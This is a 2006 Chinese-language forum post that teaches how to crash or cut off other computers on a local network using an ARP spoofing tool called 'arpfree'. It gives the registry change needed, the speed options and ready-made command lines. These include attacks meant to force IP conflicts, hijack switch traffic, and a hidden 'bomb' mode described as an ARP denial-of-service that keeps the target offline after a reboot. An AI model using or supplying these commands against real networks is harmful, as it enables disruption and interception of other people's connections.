史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
註冊帳號 論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-06-26, 06:03 AM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 軟體 - 教你讓內網任何一台電腦死機

教你讓內網任何一台電腦死機

開始忘記說了,要使用ARP欺騙,必須啟動ip路由功能,修改(新增)註冊表選項:
   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
下面的朋友發現打開網卡失敗,原因可能就是這個.

發送的時候可以選擇ARP的TYPE。如果是ARP請求報文,則只要輸入要問的IP地址

如果是ARP應答報文則要輸入發送端的IP以及對方詢問MAC地址對應的IP地址

最後的發送速度可選參數為:(大小寫敏感..我覺得挺不好的)

fast----------最快
hear---------每60MS一個包(可能是比較適合結合SNIFFER做監聽)
slowhear---每500MS一個包
auto---------每1秒一個包
slow---------每2秒個包

使用方法如下:

***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************

補充:反擊「LAN終結者」的辦法:

反擊「終結者」有幾個辦法:
1:發動比他更強烈的攻擊:
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
這裡是你想攻擊的人的IP地址
2:交換機競爭:

arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
這裡是你想攻擊的人的MAC地址

1:情況將導致他IP地址衝突(比「終結者」來的猛烈多了)

2:情況將使得他無法連接網路(由於交換機把他的流量都給你了)
———————————更-----新----消-----息—————————————————————

因為有朋友反映在非交換環境下,如使用HUB的情況下,無法對目標進行打擊

故於2006年4月5日更新附件「arpfree.rar」

增加參數「bomb」,使用方法如下:

假設,目標為IP:192.168.237.109 目標mac為:011a8575a436

攻擊命令如下:

arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb



其實就是進行簡單的ARP DOS攻擊,快速重新整理目標的ARP快取記憶體,可以在消耗自身較少系統資源的情況下

造成和PDOS工具類似的效果,並且如果你不停止攻擊,對方重啟以後也無法正常進入系統

(當然前提是他沒拔網線)。

其實這樣做是十分不厚道的....所以參數就沒有寫在程式的 HELP 裡面,大家慎用...
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 06:48 PM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1